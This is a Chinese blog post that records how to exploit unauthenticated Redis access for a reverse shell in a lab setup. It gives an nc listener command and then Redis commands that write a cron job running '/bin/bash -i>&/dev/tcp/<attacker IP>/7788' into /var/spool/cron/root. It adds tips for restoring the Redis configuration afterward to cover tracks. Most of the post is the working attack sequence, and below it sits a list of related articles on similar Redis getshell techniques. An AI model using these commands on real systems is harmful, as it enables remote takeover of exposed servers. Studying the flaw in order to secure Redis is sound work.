Redis未授权访问反弹shell记录

最新推荐文章于 2023-12-29 08:43:57 发布
最新推荐文章于 2023-12-29 08:43:57 发布
阅读量378 收藏
点赞数
分类专栏: 网络安全 信息安全 文章标签: redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq276376845/article/details/120673736
版权

环境配置情况:

攻击机:kali-2021.2 ,配置IP:10.1.25.44

redis靶机:CentOS 7.2 ,配置IP:10.3.70.70

1、在攻击机(10.1.25.44)先建立监听。

nc -nvlp 7788

2、在连接redis的客户端依次执行以下命令。

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.1.25.44/7788 0>&1\n\n"   //往当前用户的crontab里写入反弹shell,经验告诉换行\n是必须

config set dir /var/spool/cron   //配置文件夹的路径,每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面

config set dbfilename root    //这个不一定要

save    //保存

 3、执行save命令后,回去看一下攻击机,反弹shell成功。

一些命令补充知识:

1、查看redis版本信息、服务器版本等信息。

info

2、查看所有键

keys *

 3、删除key,del后加key名称,以下删除key:xxx。

del xxx

4、获取默认的redis目录、和rdb文件名:可在修改前先获取,离开时再恢复

config get dir
config get dbfilename

fengqingyuel
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2193
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
网络安全——redis授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5577
redis授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
Redis授权访问反弹shell
Zlirving_的博客
06-17 1972
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
redis授权访问反弹shell
18年3月萌新白帽子
06-26 4544
一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还创建用户,默认使用的...
从0到1浅析Redis服务器反弹Shell那些事
最新发布
道阻且长,行则将至。
12-29 1919
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
Redis攻防(授权访问、利用redis写入webshell、任务计划反弹Shellssh-keygen 公钥登录服务器、利用主从复制RCE)
Love&Share
12-13 8367
文章目录授权访问利用redis写入webshell任务计划反弹Shellssh-keygen 公钥登录服务器利用主从复制RCEwindowsSSRF安全设置 REmote DIctionary Server(Redis) 是一个 key-value 存储系统,是跨平台的非关系型(Nosql)数据库 关于Redis可以看菜鸟教程: https://www.runoob.com/redis/redis-tutorial.html 授权访问 主要是因为配置不当,导致授权访问漏洞,进一步将恶意数据写入内.
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1839
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
攻击Redis
mole_exp的博客
05-10 1270
文章目录通过写文件getshell通过主从复制getshell参考 通过写文件getshell 通过主从复制getshell 参考 [1] https://paper.seebug.org/975/ [2] https://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450775177&idx=1&sn=60f333eab252e78452f93c129c566939&scene=21#wechat_redirect [3]
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 1544
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
利用redis漏洞反弹shell
qq_54713392的博客
04-20 2098
利用redis漏洞反弹shell 攻击机:kali 192.168.32.132 目标机:centos7 192.168.32.144 (1)在目标机centos中安装redis服务器(redis-server) 解压,进入源码目录,然后编译(make、make install) 解压文件:tar -zxvf redis-2.8.17.tar.gz 移动解压文件 执行命令:mv redis-2.8.17 /usr/local/redis 进入到目录下:cd /usr/local/redis 执行ma
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 6834
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
ssrf,利用redis反弹shell
qq_67757718的博客
03-20 405
在docker中搭建容器,利用ssrf的漏洞攻击redis服务反弹shell
Redis授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权
qq_60115503的博客
05-10 791
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/写的场合使用它快速读/写 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
Redis RCE 反弹shell 漏洞复现
06-07 1039
1 Redis简介 Redis是一个开源的使用ANSI C语言编写、支持网络、科技与内存也可以持久化的日志型、Key-Value数据库,并提供多种语言的API 环境搭建
五、利用redis计划任务反弹shell
dahege666的博客
03-02 2345
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 1.先用kali监听接收shell的端口: 2.连接redis,创建一个key x,值为反弹shell语句,修改备份目录为linux计划任务目录,修改备份文件名为 root,以root身体执行计划任务 3.执行完后回到监听终端页面,但是反弹的...
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全配置,包括设置密码、限制访问IP等措施。同时,也需要及时更新Redis的版本,以防止已知漏洞被攻击利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值